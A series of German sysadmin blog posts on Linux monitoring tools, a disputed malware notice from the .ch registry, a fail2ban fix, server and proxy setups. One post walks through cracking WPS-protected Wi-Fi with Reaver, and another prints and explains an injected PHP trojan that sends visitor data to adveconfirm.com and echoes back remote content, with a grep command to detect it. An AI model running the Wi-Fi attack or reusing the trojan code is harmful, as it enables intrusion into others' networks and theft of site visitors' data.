top ist der bekannteste Helfer von Allen Top liefert eine Übersicht über den kompletten Rechner oder Server.Wichtiger jedoch, man bekommt eine Liste laufenden Prozesse angezeigt mit RAM-Auslastung und CPU Last.Diese Liste aktualisiert sich alle 3 Sekunden und zeigt auch nur so viele Einträge wie auf dem Konsolenfenster platz haben. Wer jede CPU Core einzeln sehen möchte, kann noch die Taste “1″ drücken.	top	top mit allen CPU
ps aux zeigt eine Momentaufnahme aller Programme die ausgeführt werden mit Speicher und CPU Last.Dies wird auch häufig verwendet um zu prüfen ob ein einzelner Prozess noch läuft (mit grep zusammen).		ps aux

Auch die Informationen vom Netzwerk können sehr interessant und wichtig sein. Dies überwacht man mit:

iftop liefert Statistiken vom Netzwerk.Darüber findet man raus, welche Verbindungen in welcher Richtung offen sind und wie viel Traffic darüber läuft. So kann man herausfinden welche Verbindungen am stärksten das Netzwerk belasten.		iftop
nload hilft einem zu zeigen wie stark ein Netzwerkadapter ausgelastet ist. Je höher der Graph, desto mehr Traffic läuft darüber.So sieht man schnell ob noch Bandbreite zur Verfügung steht, oder man gegebenenfalls reagieren müsste. Aktuell lief auf meinem Server nicht viel wie man sieht.		nload
nethogs zeigt welcher Prozess wie viel Daten gerade erzeugt und übers Netzwerk verschickt. Sehr nützlich zum auffinden der Prozesse die Traffic erzeugen. Vielen Dank an Zumbrunnen für die Meldung!		nethogs

Sehr oft wird über RAM und CPU gesprochen im Zusammenhang mit Performance, leider dabei die Festplatte komplett ignoriert. Sehr oft jedoch ist die Festplatte schuld an schlechter Performance.

Bei geteilten Systemen wie VM Servern und Shared Hostings wird meist nur CPU und RAM garantiert, doch keine Durchsatzrate der Festplatte. Auf VM Servern liefern diese Tools aber nur Statistiken von den virtuellen Festplatten und nicht von der dahinter liegenden Infrastruktur, was dann keine aussagekräftigen Informationen liefert. Bei virtuellen Services sollte man sich daher eine  Durchsatzrate garantierten lassen.

iotop liest die IOPS aus zu den einzelnen Programmen welche aktuell laufen.Mit diesem Tool kann man also die Programme identifizieren welche Festplattenlast erzeugen.		iotop
iostat liest die IOPS von Festplatten aus und zeigt eine Statistik.		iostat

Über die RAM bekommt man leider nicht so viele Informationen wie man gerne möchte, dennoch hierzu das Tool:

vmstat liefert mehr Informationen über die Auslastung der RAM, auch wenn das Ablesen von Daten hier sehr schwer ist, da hier nur eine Übersicht kommt und keine Details zu einzelnen Programmen.

vmstat

Wichtig ist auch, welche Daten sich gerade im Zugriff befinden. Datenbanken sind sicherlich jederzeit geöffnet und sollten daher nicht per Filebackup gesichert werden, da sonst Inkonsistenz auftreten wird.
Das Tool hierzu ist:

lsof zeigt uns alle Dateien welche gerade geöffnet sind. Diese Liste kann natürlich sehr lang werden.

lsof

Jedes der Tools hat selbstverständlich noch Möglichkeiten zur Anpassung und Filterung.

Dadurch sind dies sehr mächtige Werkzeuge im täglichen Gebrauch oder zu Analysezwecken.

Switch hatte nun eine neue Idee wie man Leute ärgern könnte um die Sicherheit zu erhöhen in dem man über alle .ch Domains ein Viren- und Malwarescanner jagt.

Sollte nun eine Datei von solch einem Scanner als Malware erkannt werden, bekommt man ein solches Mail:

Sehr geehrter Herr Murawski

SWITCH, die Registrierungsstelle für “.ch” Domains, wurde darüber informiert, dass Ihr Domain-Name murawski.ch aktuell dazu missbraucht wird, schädliche Software (Malware) zu verbreiten.

Die URLs, die uns am 23.04.2012 17:28 gemeldet wurden, sind im Folgenden angeführt. Vorsicht! Öffnen Sie die URLs nicht in Ihrem Browser, da dies bereits zu einer Infektion Ihres Rechners führen kann. Aus Sicherheitsgründen haben wir die URLs verändert (“hxxp://” statt “http://”).

hxxp://blog.murawski .ch/wp-content/uploads/2010/09/ScreenLockFucker.exe

Höchstwahrscheinlich wurde der Code zur Verbreitung der schädlichen Software unbemerkt von Dritten auf Ihrer Website platziert, zum Beispiel durch eine Sicherheitslücke auf Ihrer Website, ein schwaches Passwort oder durch Spionagesoftware auf Ihrem PC. Dies hat ernste Konsequenzen für die Besucher Ihrer Website: Gegenwärtig kann sich jeder schon beim Aufruf Ihrer Website mit gefährlicher Malware wie Viren, E-Banking-Trojanern oder Würmern infizieren.

Als Halter des genannten Domain-Namens bzw. als technischer Kontakt sind Sie für die Inhalte der Website verantwortlich. Deshalb fordern wir Sie auf, den Code zur Verbreitung der schädlichen Software umgehend, jedoch spätestens bis am 24.04.2012 17:28 zu entfernen. Falls dies bis dahin nicht erfolgen sollte, werden wir zum Schutz der Besucher Ihrer Website folgende Schritte einleiten:

1. Löschung der Name-Server-Zuordnung, gestützt auf AGB Ziff. 3.2.3 lit. b in Verbindung mit Ziff. 3.3.2 Abs. 2 lit. e. Dies bedeutet, dass Ihre Website nicht mehr erreichbar ist.
http://www.nic.ch/de/terms/agb.html

2. Blockierung des Domain-Namens, gemäss AEFV Art. 14f bis.
http://www.admin.ch/ch/d/sr/784_104/a14bist.html

3. Verständigen der zuständigen Behörden, um eine richterliche Verfügung zu beantragen.

Wir gehen davon aus, dass Sie den schädlichen Code schnellstmöglich beseitigen oder die betreffenden Websites von Ihrem Server entfernen. Unterstützung erhalten Sie dabei von Ihrem Hosting-Anbieter sowie auf der SWITCH-Website:
http://www.nic.ch/de/faq/malware.html

Bitte bestätigen Sie uns umgehend die Entfernung des Codes durch eine Antwort auf diese E-Mail.

Freundliche Grüsse

SWITCH Internet Domains
——————————————————————————–
SWITCH Internet Domains, Postfach, CH 8021 Zürich • http://www.nic.ch/de
Tel. +41 (0) 848 844080 • Fax +41 (0) 848 844081 • E-Mail helpdesk@nic.ch

Generell eine gute Idee von Switch und ich denke auch 95% aller Meldungen sind sehr treffend, doch darf man keine Arbeit nur halb machen. Wenn man eine Rückmeldung vom Kunden erhaltet, sollte man sich die Mühe machen eine Datei zu testen, anstelle einfach “Wir bestehen auf die Lösung” mitzuteilen. Denn False-Positive gibt es genauso.

Entweder man macht es richtig oder lässt es ganz. Aber bei Monopolfirmen ist dass eben so eine Sache.

Tatsächlich rapportiert Virustotal eine unbekannte Malware bei mir:
https://www.virustotal.com/file/b17e3add7c95b016a30b36640602085ca139a7ea6906aa1a7230bab428ee7be9/analysis/

Was ist das schon wieder für eine Datei?

Genau, wenn keine Benutzereingabe innerhalb von 10 Minuten passiert, sollte das Programm den Mauscurser 1 Pixel nach Links und wieder zurück bewegen. Dies, damit der Bildschirmschoner nicht aktiviert wird. Mehr kann das Programm nicht.
Schwer gefährliche Malware!!

Klar könnte ich die Datei löschen und der Drohung entgehen:

1. Löschung der Name-Server-Zuordnung, gestützt auf AGB Ziff. 3.2.3 lit. b in Verbindung mit Ziff. 3.3.2 Abs. 2 lit. e. Dies bedeutet, dass Ihre Website nicht mehr erreichbar ist.
http://www.nic.ch/de/terms/agb.html

2. Blockierung des Domain-Namens, gemäss AEFV Art. 14f bis.
http://www.admin.ch/ch/d/sr/784_104/a14bist.html

3. Verständigen der zuständigen Behörden, um eine richterliche Verfügung zu beantragen.

Aber hört es dabei auf? Oder fallen irgendwann meine anderen VB6 Programme auch mit in den Topf?

Als bekanntes Beispiel folgt der Windows 7 Service Improver, welcher auch VB6 Code ist, extrem viel am dem System rumbastelt und sogar auch schon von einem Scanner erkannt wird als Malware. Muss ich nun einfach all meine Programme entfernen weil irgendein Scanner Alarm brüllt? Viele User verlieren welche glücklich beim Setup schnell das Tool starten und Windows 7 gleich angepasst ist?

Ginge es vermutlich nach Switch wäre freie Meinungsäusserung im Internet genauso verboten wie meine Programme. Nein stimmt, ich könnte die Programme auch Passwortgeschützt Zippen und so den Scanner aus tricksen (was Switch vorschlägt)?
Ich will aber kein ZIP, ich will eine EXE und ist es nicht meine Freiheit auf meinem Server eine EXE bereitzustellen?
Rechtlich gesehen darf ich jedoch meine Programme solange verteilen wie diese keine Malware beinhalten. Da meine Programme gegebenenfalls als solches erkannt werden, macht es diese aber noch lange nicht zu Malware, denn Malware sind Schadprogramme.

Mein Programm richtet keinen Schaden an, ausser das der Bildschirmschoner nicht aktiviert wird. Löscht man das Programm oder stoppt es, ist Alles vorbei.

Ich freue mich jedenfalls schon auf die Abschaltung der Domain und die rechtlichen Konsequenzen daraus (dies sind meine Haupt DNS Server für diverse Kunden), meine Rechtsschutzversicherung wahrscheinlich weniger.

Wie ich schon sagte, den Schutz generell finde ich toll,, findet der Scanner aber nur verlinkte Dateien. Setzte ich unverlinkte Dateien auf den Server, kann ich 1000de Viren uploaden ohne das Switch etwas bemerkt.
Wie sinnvoll ist die Sache also am Ende wirklich noch?

Wie ich auch schon sagte, sollte Switch eine False-Positive Liste führen und gegebenenfalls per Sandboxie oder VM das Zeug testen sobald ein Kunde beteuert ein False-Positive in der Liste zu haben. Sonst macht das kein Sinn sonder ist reine Schikane.

Ich habe nun einfach die IPs der Scanner die regelmässig vorbeikommen gebannt und so werden sie meine Seiten nicht mehr scannen können. Mal schauen wie lange Switch den Dickschädel beibehält.

Ich glaub ich starte eine Initiative zur Abschaffung von Switch und die angesammelten Gelder müssen in den AHV Fond eingezahlt werden. Dann hätte das Volk wirklich etwas von Switch!

Ich habe mich gefragt warum Fail2Ban auf meinem Server immer wieder seinen Dienst verweigerte und Filter nicht funktionierten.

Im Logfile sah ich unter den normalen Starteinträgen auch Fehler:

2012-04-16 21:59:41,884 fail2ban.actions.action: ERROR  iptables -N fail2ban-postfix
iptables -A fail2ban-postfix -j RETURN
iptables -I INPUT -p tcp -m multiport --dports smtp,ssmtp -j fail2ban-postfix returned 200
2012-04-16 21:59:41,886 fail2ban.actions.action: ERROR  iptables -N fail2ban-ssh
iptables -A fail2ban-ssh -j RETURN
iptables -I INPUT -p tcp -m multiport --dports ssh -j fail2ban-ssh returned 400
2012-04-16 21:59:41,888 fail2ban.actions.action: ERROR  iptables -N fail2ban-proftpd
iptables -A fail2ban-proftpd -j RETURN
iptables -I INPUT -p tcp -m multiport --dports ftp,ftp-data,ftps,ftps-data -j fail2ban-proftpd returned 200
2012-04-16 21:59:41,890 fail2ban.actions.action: ERROR  iptables -N fail2ban-named-refused-tcp
iptables -A fail2ban-named-refused-tcp -j RETURN
iptables -I INPUT -p tcp -m multiport --dports domain,953 -j fail2ban-named-refused-tcp returned 200

Die Befehle welche scheinbar fehlgeschlagen sind, habe ich manuell nach kontrolliert und diese funktionieren problemlos.
Warum also gibt es Fehler und warum starten diese nicht?

Ich bin über den Hinweis gestolpert, dass die Verarbeitungszeit von Fail2Ban zu schnell ist, damit IpTables nicht alle Befehle verarbeiten kann.

Man sollte daher ein kleinen Bugfix in der Datei /usr/bin/fail2ban-client anbringen:

	def __processCmd(self, cmd, showRet = True):
		beautifier = Beautifier()
		for c in cmd:
			time.sleep(0.1)
			beautifier.setInputCmd(c)
			try:

Hat man die Sleep Zeile eingefügt, startet Fail2Ban ohne Fehler.

Ich habe bereits über die Blacktrack Distribution (Ubuntu) geschrieben, wie man dies installiert und die Adapter für das Asus Ultrabook UX31 zum laufen bekommt.

Heute zeige ich eine Möglichkeit auf WLAN’s Passwörter damit wiederherzustellen.

Dafür gibt es einige Tools, welche mit BlackTrack CD gleich mitgeliefert werden. Die mitgelieferten Tools können zwar alle WLAN Netze öffnen, benötigen aber mehr Aufwand und mehr Zeit dazu.

Ein neues Tool mit den Namen Reaver nutzt eine Sicherheitslücke welche in sehr vielen Routern vorhanden ist, um die Verschlüsselung zu öffnen, was deshalb viel schneller geht.
Die Sicherheitslücke attackiert die WPS Implementierung welche in diversen Routern vorhanden ist. Diese erlaubt es, automatisiert Geräte ins Netz aufzunehmen ohne Kenntnis für das wirkliche WLAN Passwort.
Dies sollte das Einrichten für Router erleichtern, doch hat in dem Fall ein neue Sicherheitslücke aufgemacht.

Als Grundlage für das Tool nutze ich wiederum die BackTrack Distrbution auf welcher diese Anleitung aufbaut. Da Reaver aber nicht mit BackTrack mitgeliefert wird, müssen wir dieses vorab installieren.

Dazu starten wir Blacktrack und installieren über den Command Promt das Tool:

apt-get update
apt-get install reaver -y

Damit das Tool die WLAN Karte im Monitor Modus starten kann, müssen wir zuerst den Adapter wieder deaktivieren und die Karte speziell wieder starten:

rfkill block all
airmon-ng start wlan0

Nun wird aufgelistet welches Monitor Interface gestartet wird, was meist mon0 ist. Merken!

Nun startet man die Suche nach den WLAN Netzen in der Umgebung:

airodump-ng wlan0

Falls dies nicht klappt, den Adapter mit “airodump-ng mon0″ starten.

Nun folgt eine Auflistung der gefundenen Netze welche sich dynamisch aktualisiert. Hat man das Zielnetz gesehen, kann man mit CTRL + C die Suche abbrechen. In der Auflistung kann man sich dann die BSSID Nummer merken (z.B. 00:18:AB:C4:6A:FD).

Hat man zu das Monitor Interface und die BSSID kann man wie folgt Reaver starten:

reaver -i mon0 -b 00:18:AB:C4:6A:FD -vv

Nun braucht ihr Zeit. Reaver selbst gibt an 4-10 Stunden kann es dauern, danach hat man erfolgreich das WLAN geöffnet. Wie bereits oben erwähnt geht dies Vorgehen nur für Router mit WPS Funktion.

Für Router ohne WPS Funktion muss man weiterhin auf andere Methoden zurückgreifen.

Um sich davor zu schützen, ein Router ohne WPS Funktion nutzen, oder diese deaktivieren (falls die Möglichkeit besteht).

if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;

Zuerst schaut der Code, ob er bereits einmal aufgeführt wurde, wenn nicht, startet er sich selbst, sonst lässt er es.
So führt sich der Code nur einmal aus.

// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";

Der Code ist kommentiert Nett. Laut Kommentar erstellt es Statistiken von Bots.

if((strstr($sUserAgent, 'google') == false) // Bot comes
&& (strstr($sUserAgent, 'baidu') == false) && (strstr($sUserAgent, 'msn') == false)
&& (strstr($sUserAgent, 'opera') == false) && (strstr($sUserAgent, 'chrome') == false)
&& (strstr($sUserAgent, 'bing') == false) && (strstr($sUserAgent, 'safari') == false)
&& (strstr($sUserAgent, 'bot') == false) && (strstr($sUserAgent, 'yahoo') == false))
{

Laut Kommentar, wenn ein Bot kommt, aber die Funktion macht das Gegenteil, wenn kein Bot kommt, also ein normaler User (keine opera und safari User)…

if(isset($_SERVER['REMOTE_ADDR']) == true &&
isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics

Wenn eine IP / Host von dem Aufruf gesetzt ist, also nur wirkliche Webbrowser Aufrufe, keine Cronjob oder Aufrufe vopn der Shell selbst.

$stCurlLink = base64_decode( 'aHR0cDovL2FkdmVjb25maXJtLmNvbS9zdGF0L3N0YXQucGhw').
'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).
'&domainname='.urlencode($_SERVER['HTTP_HOST']).
'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);

Hier wird eine URL zusammengesetzt, zum Beispiel diese:

http://adveconfirm.com/stat/stat.php?ip=62.167.118.61&useragent=Google%20Chrome&domainname=blog.murawski.ch&fullpath=%2Ftest.php&check=

$stCurlHandle = curl_init( $stCurlLink );
}}

Diese URL beinhaltet diverse Informationen welche dann an die Seite adveconfirm.com übermittelt wird.
Die fremde Seite hat somit alle Daten der Besucher auf der eigenen Seite.
So hat er die Besucher IP, der Browser wo benutzt wird und welche Domain er besucht hat.
Weiterhin kann auch ein Parameter übermittelt werden an die eigene Seite, womit die fremde Seite dann mitbekommt ob es wirklich angekommen ist.

Per curl_init() wird die Verbindung aufgemacht zur fremden Seite.

if ( $stCurlHandle !== NULL )
{

Hier wird geprüft ob eine Verbindung hergestellt werden konnte.

curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);

Hier wird definiert das die fremde Seite auch Code zurück an die eigene Seite senden kann.

$sResult = @curl_exec($stCurlHandle); 

Hier wird nun endlich der Code abgeschickt und die Rückgabe abgefangen.

if ($sResult[0]=="O")

Falls das erste Zeichen der Rückgabe ein O ist, beinhaltet es ein Code zum ausführen, sonst nicht.

{ $sResult[0]=" ";

Hier wird das erste Zeichen der Rückgabe gegen ein Leerzeichen ersetzt.

echo $sResult; // Statistic code end

Hier wird die Rückgabe in die eigene Seite eingebaut. Netter Java Code oder einfach versteckte Links auf fremde Seiten.
Dies nennt man BlackHat SEO, oder auch Cloaking.

}
curl_close($stCurlHandle);
}}

Und der Abschluss.

Dies war eine andere Herangehensweise eines Trojaners. Anstelle alles komplett zu Verschlüsseln und zu verstecken, hat man hier ein gut lesbaren Code erhalten, jedoch hat der Programmierer Kommentare hinzugefügt um den Seiteninhaber zu täuschen.

Die Webseite selbst welche die Codes liefert kann per Browser auch nicht aufgerufen werden, da diese bereits gesperrt wurde im Firefox:

Der Trojaner war in rund 20 PHP Dateien beim gleichen User versteckt. Der Rest vom Server war clean. Ich nehme aus diesem Grund an das ein FTP Account gehackt wurde und damit das Webhosting infiziert wurde.

Um ein kompletten Server zu scannen, kann man folgenden Befehl verwenden:

grep -e ‘aHR0cDovL2FkdmVjb25maXJtLmNvbS9zdGF0L3N0YXQucGhw’ -R /var/www/

Da ich nicht auf ein Remote Desktop verbinden möchte um die Applikation zu starten, sondern am liebsten nur die Applikation selbst starten (seamless genannt) musste ein Terminalserver her.

Auch möchte ich ein Web Gateway einrichten, falls ich mal an einem Ort mit Firewall bin, dennoch auf die Applikation komme.

Windows 2008 R2 wurde flink installiert.
In den Rollen aktivieren wir die Punkte auf dem Bild. Es ist möglich das mehrere Neustarts nötig sind um alle Rollen zu installieren. Auch wird abgeraten von Active Directory und Terminalserver auf dem ein und dem selben Server zu installieren. Da ich nicht mehrere wollte, installierte ich dies auf dem gleichen Server!

Ist Alles installiert, erstellen wir ein brauchbares Zertifikat. Dazu müssen wir uns überlegen auf welcher Domain/URL der Webserivce und Server am Ende erreichbar sein sollte.

Ich habe dazu “ts.testserver” genommen. Im RD Gateway Manager klicken wir auf den Server und öffnen die Properties und wechseln zum Tab SSL Certificate. Wichtig ist das beim Name der Domainname angegeben wird!

Anschliessend gehen wir zum RemoteApp Manager und ändern auch dort die Digitale Signature auf das neue Zertifikat.

Auch im ISS unter den SSL Settings muss das entsprechende Zertifikat noch ausgewählt werden.

In diesem Manager erstellen wir auch gleich die Applikationen welche freigegeben werden sollten. Dies ist sehr einfach und sollte keinerlei Probleme bereiten.

Da auf dem Server Terminalserver und auch das AD installiert ist, sind die RDP rechte eingeschränkt auf Administratoren. Dies ist in meinem Fall störend.

Dazu starten wir das Group Policy Management und passen 2 Mal die Rechte an. Bei den Gruppen (4 Stk) muss mindestens “Administrators und Terminalserver” eingetragen sein.
Ist das gemacht, gehen wir unter Ausführen und starten die CMD mit Administratorenrechten und updaten die GPO mit:

gpupdate /FORCE

Ist dies gemacht, müssen wir nur noch unsere User erstellen die auf den TS Zugriffe haben sollten und diese in die Gruppe Domain Users, Remote Desctop Users, Terminalserver legen.

Nun war nur noch ein kleineres Problem da. Die User können dann nicht nur die Apps starten, sondern sich auch auf dem Desktop per RDP direkt einloggen. Dies wollte ich nicht, also habe ich kurzerhand in die Trickkiste gegriffen.

Dazu erstellte ich ein Logon Skript login.bat in folgendem Verzeichnis:

C:\Windows\SYSVOL\sysvol\DEINEAD\scripts

mit dem Inhalt:

if /I "%USERNAME%" == "Administrator" GOTO ENDE
tasklist /FI "SESSIONNAME eq %SESSIONNAME%"  /FI "IMAGENAME eq explorer.exe" > %APPDATA%\tasklist.txt
for /f "Tokens=3,*" %%a in ('find /I /C "No tasks" %APPDATA%\tasklist.txt') do (
	If "%%a" == "0" (
		cd\
		cd "%systemroot%"\
		cd system32
		logoff.exe
	)
)
:ENDE

Beim User muss dann beim Logonscript nur noch Login.bat hinterlegt werden und nach dem Anmelden wird er gleich wieder abgemeldet ohne das er dies umgehen kann. RemoteApps kann er weiterhin nutzen.

PS: Das Ganze kann man mit Testlizenzen aufbauen und auch 120 Tage betreiben.

• Einleitung
• Pre-Requisites
• SSL-Explorer
• SSL-Explorer Extensions
• Virenschutz, Filterregeln & Squid
  • Havp
  • Squid
  • Werbedomains blockieren
  • Squid3 Cache
  • Anonymous Proxy
  • FTP Verbindungen
• Privoxy
• Webalizer
• Abschluss
• Danksagung

Einleitung

Ich möchte ein Web-Proxy welcher durch Squid3 funktioniert, Virenprüfung macht und Werbung heraus filtert. Dies damit egal wo ich mich befinde, auch mal beim Kunden hinter einer Firewall auf all meine Services zugreifen kann. So benötige ich nur eine Verbindung auf eine Webseite und kann danach Alles steuern.
Selbstverständlich auch noch Statistiken für die Nutzung erstellen und veröffentlichen.

Für den Web Proxy setze ich weiterhin die eingestaubte Lösung SSL-Explorer sein.

Pre-Requisites

Um die Pre-Requisites dazu ist Sun Java was im non-free Bereich ist, was man mit den folgenden Befehlen installiert:

echo '' >> /etc/apt/sources.list
echo 'deb http://mirror.switch.ch/ftp/mirror/debian/ squeeze main non-free contrib' >> /etc/apt/sources.list
echo 'deb http://mirror.switch.ch/ftp/mirror/debian/ squeeze-updates main non-free contrib' >> /etc/apt/sources.list
apt-get install ant build-essential zip unzip sun-java6-bin sun-java6-jre -y

Danach müssen wir noch die sun-java/jre auswählen für beide Java Möglichkeiten:

update-alternatives --config java

Sobald wir das eingegeben haben und mehrere Auswahlmöglichkeiten zur Verfügung stehen, kommt eine solche Liste:

There are 3 alternatives which provide `java'.
Selection Alternative
-----------------------------------------------
1 /usr/bin/gij-4.3
+ 2 /usr/lib/jvm/java-gcj/jre/bin/java
* 3 /usr/lib/jvm/java-6-sun-1.6.0.26/jre/bin/java

Press enter to keep the default[*], or type selection number:

Wie bereits gesagt, wählen wir das sun-java/jre, was in meinem Fall Nummer 3 wäre.

Das Ganze wiederholen wir auch für javac:

update-alternatives --config javac

SSL-Explorer

Nun endlich können wir den SSL-Explorer installieren:

cd /opt
wget http://downloads.sourceforge.net/project/sslexplorer/SSL-Explorer%201.0/1.0.0_RC17/sslexplorer-1.0.0_RC17-src.zip?r=http%3A%2F%2Fsourceforge.net%2Fprojects%2Fsslexplorer%2F&ts=1329904674&use_mirror=switch
unzip sslexplorer-1.0.0_RC17-src.zip*
mv sslexplorer-1.0.0_RC17 sslexplorer
cd sslexplorer
mkdir /usr/lib/jvm/java-6-sun-1.6.0.26/lib/
cp sslexplorer/sslexplorer/lib/tools.jar /usr/lib/jvm/java-6-sun-1.6.0.26/lib/
ant install

Nun wird eine Aufforderung kommen, den SSL-Explorer per Webadresse zu starten und die Installation abzuschliessen. Sobald dies erledigt ist, kümmern wir uns um den Service:

ant install-service
chmod 700 /opt/sslexplorer/sslexplorer/install/platforms/linux/x86/wrapper
chmod 700 /opt/sslexplorer/sslexplorer/install/platforms/linux/sslexplorer
chmod 700 /opt/sslexplorer/sslexplorer/install/platforms/linux/x86-64/wrapper
/etc/init.d/sslexplorer start

Der SSL-Explorer kann nun konfiguriert werden.

SSL-Explorer Extensions

Es empfiehlt sich die Module nach zu installieren. Sobald man auf den Extension Manager klickt ladet die Webseite schier unendlich (ich ging Mittagessen) irgendwann wird diese aber kommen, bitte VIEL Gedult!!
Ladet hier das Modul Paket runter und installiert die einzelnen ZIP Dateien über die Actions->Upload Extension Möglichkeit:

• sslexplorer-community-backup-restore
• sslexplorer-application-winscp
• sslexplorer-application-ultravnc
• sslexplorer-application-radmin
• sslexplorer-application-putty
• sslexplorer-application-rdp

Virenschutz, Filterregeln & Squid

Nun kümmern wir uns um den Virenschutz, die Filterregeln und den Squid3, welche wir mit folgendem Befehl installieren:

apt-get install squid3 privoxy libclamav-dev clamav clamav-freshclam -y

Havp

Havp muss per Paket installiert werden mit folgenden Befehlen:

cd /opt
wget http://archive.ubuntu.com/ubuntu/pool/universe/h/havp/havp_0.92a-2_amd64.deb
dpkg -i havp_0.92a-2_amd64.deb
apt-get -f install

Ich stelle Havp noch vom Port 8080 auf 3129 um und nur localhost Verbindungen sollen akzeptiert werden:

sed -i 's/# BIND_ADDRESS 127.0.0.1/BIND_ADDRESS 127.0.0.1/g' /etc/havp/havp.config
sed -i 's/# PORT 8080/PORT 3129/g' /etc/havp/havp.config
/etc/init.d/havp stop
/etc/init.d/havp start

Squid

Nun müssen wir noch den Privoxy hinter den Squid3 schalten mit folgendem Befehl:

echo 'cache_peer 127.0.0.1 parent 8118 0 no-query no-digest no-netdb-exchange default' >> /etc/squid3/squid.conf
echo 'never_direct allow all' >> /etc/squid3/squid.conf
sed -i 's/#http_port 3128/http_port localhost:312/g' /etc/squid3/squid.conf
sed -i 's/acl SSL_ports port 443/acl SSL_ports port 443 8443/g' /etc/squid3/squid.conf
sed -i 's/acl Safe_ports port 80/acl Safe_ports port 80 8080/g' /etc/squid3/squid.conf

Werbedomains blockieren

Nun erzeugen wir eine Blockliste von den grössten Werbeseiten und erstellen die Blacklist:

cd /opt
wget http://blog.murawski.ch/wp-content/uploads/2012/02/blocked.domains.acl
mv blocked.domains.acl /etc/squid3/blocked.domains.acl
echo "## Liste aktualisiert am: `date +%y%m%d`" > /etc/squid3/autoblocked.domains.acl
wget -O - http://www.mvps.org/winhelp2002/hosts.txt | grep 127.0.0.1  | sed -e '2,$s/127.0.0.1[[:space:]]*//g' -e 's/#.*$//' | grep -v localhost >> /etc/squid3/autoblocked.domains.acl
#Hack für GMX Mailaccounts
sed -i 's/.uimserv.net/.uimserv.net.disabled/g' /etc/squid3/autoblocked.domains.acl
echo 'acl blockeddomain dstdomain "/etc/squid3/blocked.domains.acl"' >> /etc/squid3/squid.conf
echo 'acl blockeddomain2 dstdomain "/etc/squid3/autoblocked.domains.acl"' >> /etc/squid3/squid.conf
echo 'http_access deny blockeddomain' >> /etc/squid3/squid.conf
echo 'http_access deny blockeddomain2' >> /etc/squid3/squid.conf
echo 'half_closed_clients     off' >> /etc/squid3/squid.conf
echo 'hierarchy_stoplist cgi-bin ?' >> /etc/squid3/squid.conf
echo 'acl QUERY urlpath_regex cgi-bin \?' >> /etc/squid3/squid.conf
echo 'no_cache deny QUERY' >> /etc/squid3/squid.conf
echo 'no_cache deny localhost' >> /etc/squid3/squid.conf
echo 'no_cache deny CONNECT' >> /etc/squid3/squid.conf
echo 'no_cache allow all' >> /etc/squid3/squid.conf

Squid3 Cache

Schalten den Cache (30MB) vom Proxy an und stellen ein das nur Dateien mit 43MB oder kleiner heruntergeladen werden dürfen:

touch /etc/squid3/cachemgr.conf
echo 'localhost' > /etc/squid3/cachemgr.conf
echo 'cache_store_log none' >> /etc/squid3/squid.conf
echo 'cache_dir aufs /var/spool/squid3 812 16 256' >> /etc/squid3/squid.conf
echo 'maximum_object_size 32768 KB' >> /etc/squid3/squid.conf
echo 'reply_body_max_size 43000 KB' >> /etc/squid3/squid.conf
echo 'pipeline_prefetch       on' >> /etc/squid3/squid.conf

Anonymous Proxy

Möchte man ein Anonymen Proxy, kann man noch folgende Einstellungen vornehmen:

echo 'forwarded_for off' >> /etc/squid3/squid.conf
echo 'via off' >> /etc/squid3/squid.conf

FTP Verbindungen

Wer FTP auch tunneln möchte, kann folgende Einstellungen vornehmen:

echo 'acl ftp proto FTP' >> /etc/squid3/squid.conf
echo 'http_access allow ftp' >> /etc/squid3/squid.conf
echo 'ftp_passive off' >> /etc/squid3/squid.conf

Damit auch alles Aktiv wird, müssen wir noch den Dienst neustarten:

/etc/init.d/squid3 restart

Privoxy

Den Privoxy schicken wir wiederum zu Havp, um über Clamav nach Viren zu suchen:

echo 'forward / 127.0.0.1:3129' >> /etc/privoxy/config
/etc/init.d/privoxy restart

Webalizer

Für die Statistik brauchen wir noch den Webalizer welchen wir mit folgendem Befehl installieren:

apt-get install webalizer -y

Damit dieser auch weiss was machen, legen wir die Config was die Logfiles auswertet und uns die Statistiken anzeigt:

cd /etc/webalizer
touch webalizer-squid3.conf
echo 'LogFile /var/log/squid3/access.log' >> webalizer-squid3.conf
echo 'LogType squid' >> webalizer-squid3.conf
echo 'HistoryName webalizer.hist' >> webalizer-squid3.conf
echo 'Incremental yes' >> webalizer-squid3.conf
echo 'IncrementalName webalizer.current' >> webalizer-squid3.conf
echo 'ReportTitle Statistik für' >> webalizer-squid3.conf
echo 'HostName SSL-Explorer' >> webalizer-squid3.conf
echo 'PageType htm*' >> webalizer-squid3.conf
echo 'PageType cgi' >> webalizer-squid3.conf
echo 'PageType php3' >> webalizer-squid3.conf
echo 'PageType php' >> webalizer-squid3.conf
echo 'Quiet yes' >> webalizer-squid3.conf
echo 'TimeMe yes' >> webalizer-squid3.conf
echo 'CountryGraph no' >> webalizer-squid3.conf
echo 'TopSites 10' >> webalizer-squid3.conf
echo 'TopKSites 10' >> webalizer-squid3.conf
echo 'TopURLs 30' >> webalizer-squid3.conf
echo 'TopKURLs 10' >> webalizer-squid3.conf
echo 'TopReferrers 30' >> webalizer-squid3.conf
echo 'TopAgents 15' >> webalizer-squid3.conf
echo 'TopCountries 10' >> webalizer-squid3.conf
echo 'TopEntry 10' >> webalizer-squid3.conf
echo 'TopExit 10' >> webalizer-squid3.conf
echo 'TopSearch 10' >> webalizer-squid3.conf
echo 'TopUsers 0' >> webalizer-squid3.conf
echo 'AllURLs yes' >> webalizer-squid3.conf
echo 'HideURL *.gif' >> webalizer-squid3.conf
echo 'HideURL *.GIF' >> webalizer-squid3.conf
echo 'HideURL *.jpg' >> webalizer-squid3.conf
echo 'HideURL *.JPG' >> webalizer-squid3.conf
echo 'HideURL *.png' >> webalizer-squid3.conf
echo 'HideURL *.PNG' >> webalizer-squid3.conf
echo 'HideURL *.rar' >> webalizer-squid3.conf
echo 'HideURL */gateway/gateway.dll' >> webalizer-squid3.conf
echo 'GroupURL /cgi-bin/* CGI Scripts' >> webalizer-squid3.conf
echo 'GroupURL /images/* Images' >> webalizer-squid3.conf
echo 'GroupSite *.facebook.com' >> webalizer-squid3.conf
echo 'GroupSite *.google.com' >> webalizer-squid3.conf
echo 'GroupSite *.google.ch' >> webalizer-squid3.conf
